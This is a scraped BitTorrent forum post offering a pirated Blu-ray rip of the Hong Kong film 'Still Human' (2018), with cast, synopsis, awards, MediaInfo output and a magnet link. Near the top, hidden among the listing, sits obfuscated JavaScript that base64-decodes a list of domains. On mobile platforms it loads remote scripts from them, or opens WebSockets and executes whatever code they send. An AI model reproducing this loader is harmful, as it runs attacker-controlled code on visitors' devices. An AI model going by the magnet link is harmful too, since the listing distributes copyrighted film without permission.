沦落人[国粤语音轨/中文字幕]Still.Human.2018.1080p.BluRay.x264.DTS.2Audio-迅雷下载 9.95GB

版主小s 19天前 314

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 沦落人 / Still Human

◎片 名 淪落人

◎年 代 2018

◎产 地 中国香港

◎类 别 剧情

◎语 言 粤语

◎上映日期 2019-04-11(中国香港) / 2018-11-08(台北金马影展)

◎IMDb链接 https://www.imdb.com/title/tt8497794/

◎豆瓣评分 8.2/10 (35871人评价)

◎豆瓣链接 https://movie.douban.com/subject/30140231/

◎片 长 112分钟

◎导 演 陈小娟 Oliver Chan (id:1382173)

◎编 剧 陈小娟 Oliver Chan (id:1382173)

◎演 员 黄秋生 Anthony Wong Chau-Sang (id:1050076)

克里瑟尔·孔松希 Crisel Consunji (id:1389097)

叶童 Cecilia Yip (id:1033481)

李灿森 Sam Lee (id:1028522)

黄定谦 Himmy Wong (id:1379150)

黄素欢 Gobby Wong (id:1378629)

梁健怡 Jasmine Leung (id:1383507)

刘朝健 Gordon Lau (id:1396199)

黄翠仪 Wong Chui Yee (id:1378627)

陈果 Fruit Chan (id:1000726)

赵啟岚 Matt Chiu (id:1421663)

陈果 Fruit Chan (id:1000726)

◎标 签 香港 / 温情 / 人生 / 剧情 / 梦想 / 感人 / 人性 / 2018

◎简 介

这是关于两个沦落香港的最低下层的人的故事。中年男子汉昌荣(黄秋生饰)因意外受伤瘫痪后妻离子散,他认为人生再没有值得期望的东西,而自己亦不值得拥有任何东西。年轻菲佣Evelyn(Crisel Consunji饰)因为现实的原因,成为了一个寄人篱下的工人,放弃了成为摄影师的梦想。那一个夏天,这样的两个陌生人相遇相识,感情在他们的主仆关系中发芽,然而盛放的,却是灵魂与灵魂之间的尊重和爱。他们一起经历的春夏秋冬,令他们学习到底要怎样面对人生的四季。

◎获奖情况 (共9项)

第38届香港电影金像奖 (2019)

最佳电影(提名)

└──陈小娟 (id:1382173)

最佳导演(提名)

└──陈小娟 (id:1382173)

最佳编剧(提名)

└──陈小娟 (id:1382173)

最佳男主角

└──黄秋生 (id:1050076)

最佳女主角(提名)

└──克里瑟尔·孔松希 (id:1389097)

最佳男配角(提名)

└──李灿森 (id:1028522)

最佳新演员

└──克里瑟尔·孔松希 (id:1389097)

新晋导演

└──陈小娟 (id:1382173)

第13届亚洲电影大奖 (2019)

最佳新导演

└──陈小娟 (id:1382173)

  1. General

  2. Unique ID : 298919853615967225191089573746209475774 (0xE0E1DEA4FE0D2248D1F624C549404CBE)

  3. Complete name : [email protected]kv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 9.95 GiB

  7. Duration : 1 h 51 min

  8. Overall bit rate : 12.7 Mb/s

  9. Movie name : Still Human 2018

  10. Encoded date : UTC 2021-07-12 14:21:06

  11. Writing application : mkvmerge v59.0.0 ('Shining Star') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4

  13. Cover : Yes

  14. Attachments : cover.jpg


  15. Video

  16. ID : 1

  17. Format : AVC

  18. Format/Info : Advanced Video Codec

  19. Format profile : [email protected]

  20. Format settings : CABAC / 4 Ref Frames

  21. Format settings, CABAC : Yes

  22. Format settings, Reference frames : 4 frames

  23. Codec ID : V_MPEG4/ISO/AVC

  24. Duration : 1 h 51 min

  25. Bit rate : 10.8 Mb/s

  26. Width : 1 920 pixels

  27. Height : 1 040 pixels

  28. Display aspect ratio : 1.85:1

  29. Frame rate mode : Constant

  30. Frame rate : 24.000 FPS

  31. Color space : YUV

  32. Chroma subsampling : 4:2:0

  33. Bit depth : 8 bits

  34. Scan type : Progressive

  35. Bits/(Pixel*Frame) : 0.225

  36. Stream size : 8.43 GiB (85%)

  37. Writing library : x264 core 163 r3059+79M f2a8266 t_mod_test_xavc [(8 & 10)[email protected] X86_64]

  38. Encoding settings : cabac=1 / ref=4 / deblock=1:-3:-3 / analyse=0x3:0x133 / me=umh / subme=11 / psy=1 / fade_compensate=0.00 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=48 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=0 / chroma_qp_offset=-3 / threads=32 / lookahead_threads=8 / sliced_threads=0 / nr=0 / decimate=0 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / constrained_intra=0 / fgo=0 / bframes=11 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=1 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / intra_refresh=0 / rc_lookahead=72 / rc=crf / mbtree=0 / crf=16.0000 / qcomp=0.60 / qpmin=0:0:0 / qpmax=69:69:69 / qpstep=4 / vbv_maxrate=62500 / vbv_bufsize=78125 / crf_max=0.0 / nal_hrd=none / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / pb_ratio=1.30 / aq=3:0.85 / aq-sensitivity=10.00 / aq-factor=1.00:1.00:1.00 / aq2=0 / aq3=0

  39. Default : Yes

  40. Forced : No


  41. Audio #1

  42. ID : 2

  43. Format : DTS

  44. Format/Info : Digital Theater Systems

  45. Codec ID : A_DTS

  46. Duration : 1 h 51 min

  47. Bit rate mode : Constant

  48. Bit rate : 1 536 kb/s

  49. Channel(s) : 6 channels

  50. Channel layout : C L R Ls Rs LFE

  51. Sampling rate : 48.0 kHz

  52. Frame rate : 93.750 FPS (512 SPF)

  53. Bit depth : 16 bits

  54. Compression mode : Lossy

  55. Stream size : 1.20 GiB (12%)

  56. Title : Cantonese

  57. Language : Chinese

  58. Default : Yes

  59. Forced : No


  60. Audio #2

  61. ID : 3

  62. ID in the original source medium : 4353 (0x1101)

  63. Format : AC-3

  64. Format/Info : Audio Coding 3

  65. Commercial name : Dolby Digital

  66. Codec ID : A_AC3

  67. Duration : 1 h 51 min

  68. Bit rate mode : Constant

  69. Bit rate : 384 kb/s

  70. Channel(s) : 2 channels

  71. Channel layout : L R

  72. Sampling rate : 48.0 kHz

  73. Frame rate : 31.250 FPS (1536 SPF)

  74. Compression mode : Lossy

  75. Stream size : 307 MiB (3%)

  76. Title : Mandarin

  77. Language : Chinese

  78. Service kind : Complete Main

  79. Default : Yes

  80. Forced : No

  81. Original source medium : Blu-ray


  82. Text #1

  83. ID : 4

  84. ID in the original source medium : 4608 (0x1200)

  85. Format : PGS

  86. Muxing mode : zlib

  87. Codec ID : S_HDMV/PGS

  88. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  89. Duration : 1 h 45 min

  90. Bit rate : 25.7 kb/s

  91. Count of elements : 1961

  92. Stream size : 19.4 MiB (0%)

  93. Title : cht

  94. Language : Chinese

  95. Default : No

  96. Forced : No

  97. Original source medium : Blu-ray


  98. Text #2

  99. ID : 5

  100. ID in the original source medium : 4609 (0x1201)

  101. Format : PGS

  102. Muxing mode : zlib

  103. Codec ID : S_HDMV/PGS

  104. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  105. Duration : 1 h 45 min

  106. Bit rate : 27.9 kb/s

  107. Count of elements : 1961

  108. Stream size : 21.1 MiB (0%)

  109. Language : English

  110. Default : No

  111. Forced : No

  112. Original source medium : Blu-ray


  113. Menu

  114. 00:00:00.000 : Chapter 01

  115. 00:05:34.833 : Chapter 02

  116. 00:09:23.166 : Chapter 03

  117. 00:15:54.500 : Chapter 04

  118. 00:20:04.375 : Chapter 05

  119. 00:25:01.625 : Chapter 06

  120. 00:32:30.208 : Chapter 07

  121. 00:38:40.000 : Chapter 08

  122. 00:43:36.916 : Chapter 09

  123. 00:48:17.166 : Chapter 10

  124. 00:54:52.500 : Chapter 11

  125. 00:58:32.875 : Chapter 12

  126. 01:03:50.333 : Chapter 13

  127. 01:09:50.000 : Chapter 14

  128. 01:14:01.583 : Chapter 15

  129. 01:19:46.708 : Chapter 16

  130. 01:24:43.750 : Chapter 17

  131. 01:30:01.291 : Chapter 18

  132. 01:39:51.750 : Chapter 19

  133. 01:48:53.916 : Chapter 20


TAGS 剧情

磁力链:
  • magnet:?xt=urn:btih:094FDA9FE12C1D2DF817112CDE1814CFEFB34348
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回